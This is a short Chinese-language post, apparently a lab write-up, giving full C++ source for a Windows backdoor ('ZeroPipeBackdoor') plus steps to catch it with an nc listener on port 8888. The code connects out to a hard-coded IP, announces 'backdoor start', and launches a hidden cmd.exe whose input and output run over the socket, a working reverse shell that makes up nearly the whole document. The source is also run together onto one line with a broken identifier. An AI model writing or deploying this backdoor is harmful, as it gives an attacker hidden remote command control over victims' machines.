零管道返回cmdshell

零管道返回cmdshell

192.168.139.128

为虚拟机的IP地址。

实验步骤：

1 在虚拟机中开启nc -l -v -p 8888进行监听

2. 运行编译好的程序

虚拟机就会得到实体机的cmd了....

// ZeroPipeBackdoor.cpp : Defines the entry point for the console application.//#include "stdafx.h"#include <winsock2.h>#pragma comment(lib, "WS2_32.lib")// 链接到WS2_32.libvoid cmdshell(SOCKET s){char szSysDir[MAX_PATH] = {0};GetSystemDirectory(szSysDir, MAX_PATH);strcat(szSysDir, "\\cmd.exe");STARTUPINFO si = {0};GetStartupInfo(&si);si.wShowWindow = SW_HIDE;si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;si.hStdInput = si.hStdOutput = si.hStdError = (void *)s;PROCESS_INFORMATION pi = {0};::CreateProcess(NULL, szSysDir, NULL, NULL, true, 0, NULL, NULL, &si, &pi );::WaitForSingleObject(pi.hProcess, INFINITE);}int main(int argc, char* argv[]){char MyMessage[512] = {0};strcpy(MyMessage, "backdoor start");// 初始化WS2_32.dllWSADATA wsaData;WORD sockVersion = MAKEWORD(2, 2);if(::WSAStartup(sockVersion, &wsaData) != 0){return -1;}SOCKETs = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);if (s == INVALID_SOCKET){return -1;}sockaddr_in sin;sin.sin_family = AF_INET;sin.sin_port = htons(8888);sin.sin_addr.S_un.S_addr = inet_addr("192.168.139.128");if ( connect(s, (sockaddr*)&sin, sizeof(sin)) == -1 ){int nErr = GetLastError();return -1;}if (send(s, MyMessage, sizeof(MyMessage), 0) == SOCKET_ERROR){printf("send error");return -1;}cmdshell(s);printf("Hello World!\n");return 0;}